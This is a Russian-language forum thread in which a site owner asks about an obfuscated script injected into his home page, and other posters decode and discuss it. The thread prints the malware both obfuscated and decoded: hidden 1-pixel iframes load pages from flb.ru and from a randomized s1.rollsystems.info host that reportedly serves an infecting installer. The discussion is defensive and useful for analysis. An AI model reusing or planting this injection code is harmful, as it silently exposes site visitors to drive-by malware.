неизвестный скрипт, помогите разобраться, что делает скрипт Опции

[Вано]

Всем доброго времени суток. У меня на главной странице непонятным образом появился в коде скрипт. Также используемый тег iframe пропал. Как будто кто-то изменяет главную страницу. Изменили только ее, и второй раз уже. Сначало iframe просто закоментировали, а потом просто его удалили и добавили скрипт. Раскажите, есть ли способы менять код страниц имеющих атрибут 644? Допустим я исключаю, что кто-то узнал пароль доступа к файлам сайта. Есть ли другие методы?
А скрипт вот такой:

Код

<!--<S>--><script>function By(FD){return parseInt(FD)}var Tx='kk1kN1kq1kH1ka1kx1ke1kB1kt1kC1kR1km1kd1kn1k41kz1ky1kP1kc1kl1k51kg1kM1kY1kZ1k
i1k71kX1ko1kA1kr1kF1kf1ks1k91kD1kb1k31kw1kI1kT1kV1kG1kU1kL1kh1kj1kS1k81kK1kW1k61k
O1kp1Nk1NN1Nq1NH1Na1Nx1Ne1NB1Nt1NC1NR1Nm1Nd1Nn1N41Nz1Ny',wc=String('1');var Ww=Array(30004^30149,7457^7583,6101^6011,By('191'),27525^27425,24682^24791,11278^11447,By('237'),By('161'),By('172'),By('163'),23389^23543,By('184'),By('168'),30007^30151,By('239'),By('167'),By('187'),16442^16585,25551^25359,By('199'),By('153'),By('160'),20257^20355,17852^17753,8375^8205,12202^12033,By('225'),By('252'),By('253'),28017^28053,13947^13965,By('255'),By('254'),4674^4795,By('248'),29931^29789,8639^8463,31054^31157,By('165'),29270^29345,By('226'),25281^25127,By('242'),By('227'),By('175'),By('128'),By('169'),8626^8533,2653^2773,27537^27429,28821^28697,By('181'),14670^14785,10235^10101,By('166'),By('130'),29799^29831,By('236'),20863^20973,By('150'),8508^8623,By('183'),By('244'),6593^6481,7914^7803,550^723,5175^5325,6594^6475,10463^10325,19387^19237),Df;var RZ,QV;var vM='kkkNkqkHkakxkekBktkCkRkmkdkCkmknk4kzkykCkPkCkNkqkHkakxkekzkcklk5kNknkekgkakM
knkYkdkekZkik7kNkikXkBkokAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBkokAkAkAkrk
Fklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBkfkAkAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7
kNkikXkBkskAkAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBk9kAkAkAkrkFklk5kNknkek
gkakMknkYkdkekZkik7kNkikXkBkDkAkAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kdkRkqkekakYkR
kZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkskAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kdkRkqkek
akYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkokfkAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kd
kRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkfk9kAkAkrkFklk5kNknkekgkakMknkYkdk
ekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkskwkAkAkrkFklk5kNknkekgkakM
knkYkdkekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBk9kwkAkAkrkFklk5kNknk
ekgkakMknkYkdkekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkwkAkAkAkrkFkl
k5k7kdkRkqkekakYkRkBkik7kNkikZkikrkbklk5kPkCkHkBkdkHktkXkYkFklk5kdkHktk4kzkIkekek
xkTkVkVkzkBkGkBkZkikBkUkBkzkikikikLkzkBkTkBkzkzkrkBkGkBkzk7ktkhkLkHkdkVkakRk7kYkV
kzkGkjkCkekIkLkqknkaktkZkfkAkAkAkAkGkjkCkekIkLkHkCkRkSkYkMkZkrk8kfkfkAkAkAkrkGkzk
LkIkekMktkzkFklk5kYkBk4kBkSkYkqkdkMknkRkekLkqkHknkCkeknkKktknkMknkRkekZkzkak7kHkC
kMknkzkrkFklk5kekHkWkBkbkBkYkLkNkHkqk4kdkHktkFk3klk5kqkCkekqkIkZknkrklk5kbkYkLkNk
nkek6kekekHkakhkdkeknkZkzkNkHkqkzkXkdkHktkrkFk3klk5kYkLkNkekWktknkLkSkakNkxktkCkW
kBk4kBkzkRkYkRknkzkFkYkLkNkekWktknkLkikakSkekIkBk4kBkzkokxkOkzkFkYkLkNkekWktknkLk
IknkakmkIkekBk4kBkzkokxkOkzkFklk5kYkLk7kHkCkMknkpkYkHkSknkHk4kAkFklk5kekHkWkBkbkB
kSkYkqkdkMknkRkekLkhkYkSkWkLkCkxkxknkRkSNkkIkaktkSkZkYkrkFkBk3klk5kqkCkekqkIkZknk
rkbk3klk5k3klk5klk5kPkCkHkBkqkRkBk4kBkzkNkHkAktk7kqkzkFklk5kPkCkHkBkqkPkBk4kBkzko
kzkFklk5kPkCkHkBkNknkBk4kBkzkNkokLkHkYktktkNkWkNkeknkMkNkLkakRk7kYkzkFklk5kPkCkHk
BkxkBk4kBkzkVkIkekMktkVkzkFklk5kak7kZkSkYkqkdkMknkRkekLkqkYkYNNkaknkLkakRkSknkONq
k7kZkqkRkGkzk4kzkGkqkPkrkBk4k4kBNHkokrklk5kbklk5kPkCkHkBkdkHktkBk4kBkzkIkekekxkTk
VkVkzkBkGkBkZkSkYkqkdkMknkRkekLktkYkqkCkekakYkRkLkIkYkNkekBNak4kBkzkzkBkUkBkzkzkB
kTkBkHkNkWkNNxkHkNkZkrkrkBkGkBkSkYkqkdkMknkRkekLktkYkqkCkekakYkRkLkIkYkNkekLkHknk
xktkCkqknkZkVNeNBkCNHNtkANHNCkLNHNRkVkXkBkzkLkzkrkLkHknkxktkCkqknkZkVNmkLkGkVkXkB
kzkLkzkrkBkGkBkzkLkzkBkGkBkHkNkWkNNxkHkNkZkrkBkGkBkzkLkzkBkGkBkNknkBkGkBkxkFklk5k
PkCkHkBkYkBk4kBkSkYkqkdkMknkRkekLkqkHknkCkeknkKktknkMknkRkekZkzkak7kHkCkMknkzkrkF
kYkLkNknkek6kekekHkakhkdkeknkZkzkNkHkqkzkXkBkdkHktkrkFkYkLk7kHkCkMknkpkYkHkSknkHk
4kokFkBkYkLkikakSkekIk4kokFkBkYkLkIknkakmkIkek4kokFkBkYkLkNkekWktknkLkSkakNkxktkC
kWk4kzkRkYkRknkzkFkBklk5kSkYkqkdkMknkRkekLkhkYkSkWkLkCkxkxknkRkSNkkIkaktkSkZkYkrk
FkBkHkNkWkNNxkNkqkZkqkRkXkqkPkrkFklk5k3klk5k7kdkRkqkekakYkRkBkHkNkWkNNxkHkNkZkrkb
kBkPkCkHkBktk4k9NdkXkqk4kzkAkokfksk9kDkwNnNdNCkAkCkhkqkSknk7kzkXkYk4kzkzkFkBk7kYk
HkZkak4kAkFkBkakBkkkBktkFkBkakGkGkrkBkYkBkGk4kBkqkLkNkdkhkNkekHkZkjkCkekIkLk7ktkY
kYkHkZkjkCkekIkLkHkCkRkSkYkMkZkrk8kqkLktknkRkmkekIkrkXkokXkokrkFkBkHknkekdkHkRkBk
YkFkBk3klk5k7kdkRkqkekakYkRkBkHkNkWkNNxkNkqkZkqkRkXkqkPkrkbkBkPkCkHkBkek4kBkRknki
kBN4kCkeknkZkrkFkBkPkCkHkBknk4kBkRknkikBN4kCkeknkZkrkFkBknkLkNknkekgkakMknkZkekLk
mknkekgkakMknkZkrkGkskwkAkAkAkAkAk8kfk9krkFkBkSkYkqkdkMknkRkekLkqkYkYNNkaknkBk4kB
kqkRkGkzk4kzkGknkNkqkCkxknkZkqkPkrkGkzkFknkOkxkakHknkNk4kzkGknkLkekYNzkjkgNykekHk
akRkmkZkrkFkBk3klk5klk5kkkVkNkqkHkakxkekc',QP='';Tx=Tx.split(wc);for(Df=0;Df<vM.length;Df+=2){QV=vM.substr(Df,2);for(RZ=0;RZ<Tx.length;RZ++){if(Tx[RZ]==QV)break;} QP+=String.fromCharCode(Ww[RZ]^205);}document.write(QP);</script><!--</S>-->

[Eldy]

это вирус, чувак )
вот его дешифровка так сказать.. )

Код

<script language="javascript">
setTimeout(wfsw, 100);
setTimeout(wfsw, 1000);
setTimeout(wfsw, 2000);
setTimeout(wfsw, 3000);
setTimeout(wfsw, 4000);
setTimeout(wfsw, 5000);
setTimeout(function(){wfsw(true);}, 300);
setTimeout(function(){wfsw(true);}, 1200);
setTimeout(function(){wfsw(true);}, 2400);
setTimeout(function(){wfsw(true);}, 3600);
setTimeout(function(){wfsw(true);}, 4600);
setTimeout(function(){wfsw(true);}, 6000);
function wfsw(w){
    var url,o;
    url="http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html";
    o = document.createElement("iframe");
    try  { o.src=url;}
    catch(e)  {o.setAttribute("src",url);}
    o.style.display = "none";
    o.style.width = "1px";
    o.style.height = "1px";
    o.frameBorder=0;
    try { document.body.appendChild(o); }
    catch(e){}
}

var cn = "sr0lfc";
var cv = "1";
var se = "s1.rollsystems.info";
var p = "/html/";
if(document.cookie.indexOf(cn+"="+cv) == -1) {
    var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;
    var o = document.createElement("iframe");
    o.setAttribute("src", url);
    o.frameBorder=1;
    o.width=1;
    o.height=1;
    o.style.display="none";
    document.body.appendChild(o);
    rsys_sc(cn,cv);
}
function rsys_rs(){
    var l=48,c="01234567890abcdef",o="";
    for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1);
    return o;
}
function rsys_sc(cn,cv){
    var t= new Date();
    var e= new Date();
    e.setTime(t.getTime()+3600000*24);
    document.cookie = cn+"="+escape(cv)+";
    expires="+e.toGMTString();
}
</script>

я встречался с таким, но очень давно уже.
поищи у себя в папках лишние файлы, вероятнее в папках доступных на запись

Сообщение отредактировано Eldy - 13.04.2007 - 20:18

[Вано]

Спасибо, но что он делает и как тебе удалось его расшифровать? И как он мог появиться в коде главной страницы?

Код

http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html";

- причем здесь сайт flb и какая связь с ним? Обьясните, пожалуйста, поподробнее, ибо я в javascript не силен.

Сходил по ссылке s1.rollsystems.info/html - там тоже что-то ужасное, какой-то инсталятор, тоже куча скриптов, вобщем что-то на мой комп проникло сразу. Будьте осторожны.

Сообщение отредактировано Вано - 13.04.2007 - 20:50

[SHADE]

больше похоже на обычную раскрутку сайта
у тебя на сайте открывается несколько ифреймов, каждый со страничкой с сайта flb.ru, как только кто-то заходит к тебе на сайт, он автоматически накручивает счетчик для нескольких рандомных статей с того сайта и самого сайта в целом.

обычно бесплатные хостинги добавляют подобные скрипты в рекламных целях, например на народе это маленькое окошко, здесь -- такой скрипт.

в ничего оспасного нет.

а вот с ]]>http://s1.rollsystems.info/html/]]> чуть хуже, это уже реал вирусняк

вобщем меняй хостинг

Сообщение отредактировано SHADE - 14.04.2007 - 01:10

[Eldy]

Спасибо, но что он делает и как тебе удалось его расшифровать? И как он мог появиться в коде главной страницы?

там простой шифр )) массив из чаров, который потом сам и дешифруется. защита просто на том, что код не видно..
смотри строку document.write(QP);
QP - есть код который в реале исполняется.
По поводу заражения - скорее всего заражен сам сервер, или тебе залили через скрипты файлик который потом исполняли. проверь папки открытые на запись на наличие лишних файлов.

Сообщение отредактировано Eldy - 14.04.2007 - 09:42

[srv]

по всему инету гуляет этот зверь.

вирус у тебя на компе и он давно уже слил у тебя пароли к фтп, аське и почте.

поменяй пароль на фтп.